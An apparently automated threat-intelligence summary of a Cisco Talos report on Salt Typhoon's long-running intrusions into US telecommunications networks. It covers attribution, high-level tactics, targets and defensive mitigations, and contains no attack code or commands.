Full Report
Having tracked reports of extensive intrusion activities targeting several U.S. telecommunications firms, researchers from Cisco Talos have investigated... The post Cisco Talos warns of prolonged intrusions in US critical infrastructure by Salt Typhoon hackers using LOTL techniques appeared first on Industrial Cyber.
Analysis Summary
# Threat Actor: Salt Typhoon (and RedMike)
## Attribution & Identity
Linked to the Chinese government/entities tied to Beijing. Investigated by Cisco Talos. Corresponds to the group named 'RedMike' by Recorded Future's Insikt Group.
## Activity Summary
The threat actor conducted extensive intrusion activities, primarily targeting U.S. telecommunications firms and internet service providers. The campaign, dubbed ‘Salt Typhoon’ by investigators, focused on compromising core U.S. infrastructure to pursue sensitive information. A hallmark of the campaign is sustained persistence, with one instance showing access maintained for over three years. The associated group RedMike targeted internet-facing Cisco network devices, predominantly affecting global telecommunications providers between December 2024 and January 2025.
## Tactics, Techniques & Procedures
- **Initial Access:** Gaining access through the use of legitimate, stolen victim login credentials.
- **Persistence & Credential Harvesting:** Maintaining persistence across multi-vendor equipment; actively attempting to acquire additional credentials by obtaining network device configurations and deciphering accounts with weak password types.
- **Data Collection:** Capturing SNMP, TACACS, and RADIUS traffic, including secret keys, to enumerate credential details.
- **Exfiltration:** Exfiltrating device configurations (often containing sensitive authentication material like SNMP R/W community strings and weakly encrypted local passwords) over TFTP and/or FTP.
- **Lateral Movement/Pivoting:** Significant use of 'machine to machine' pivoting through compromised infrastructure (hop points) across different manufacturer equipment to move within trusted segments or conduct exfiltration operations, often using bypassed access controls by manipulating AAA server settings.
- **Technique:** Heavy use of living-off-the-land (LOTL) techniques on network devices.
- **Tooling:** Use of a custom-built utility.
## Targeting
- **Sectors:** Telecommunications firms, Internet Service Providers (ISP), and core U.S. infrastructure.
- **Geography:** Primarily the United States, with victims including a U.S.-based affiliate of a U.K. telecommunications provider and a telecommunications provider based in South Africa.
- **Victims:** Several U.S. telecommunications firms; a handful of U.S. internet service providers.
## Tools & Infrastructure
- **Malware families used:** Not explicitly named beyond a "custom-built utility."
- **Infrastructure (C2, domains, IPs):** No specific C2 domains or IPs were defanged and provided in the context. The actor utilized AAA server settings with supplemental addresses under their control to bypass access control systems.
## Implications
This campaign represents significant, long-term cyber espionage targeting critical U.S. infrastructure networks (telecoms/ISPs). The actor demonstrates sophisticated persistence, advanced credential harvesting techniques on network equipment, and effective pivoting capabilities to move laterally and exfiltrate data while remaining undetected, indicating a high level of operational tradecraft associated with a state-sponsored entity.
## Mitigations
- Conduct comprehensive configuration management and auditing for network devices.
- Conduct comprehensive authentication/authorization/command issuance monitoring.
- Monitor syslog and AAA logs for unusual activity, specifically decreases or gaps in logged activity.
- Profile (fingerprint via NetFlow and port scanning) network devices for shifts in surface view (new ports opening/closing, traffic in/out of devices).
- Develop NetFlow visibility to identify unusual volumetric changes.
- Look for non-empty or unusually large `.`bash_history files on devices.
- Ensure timely patching of known CVEs that threat actors might leverage with publicly available tooling.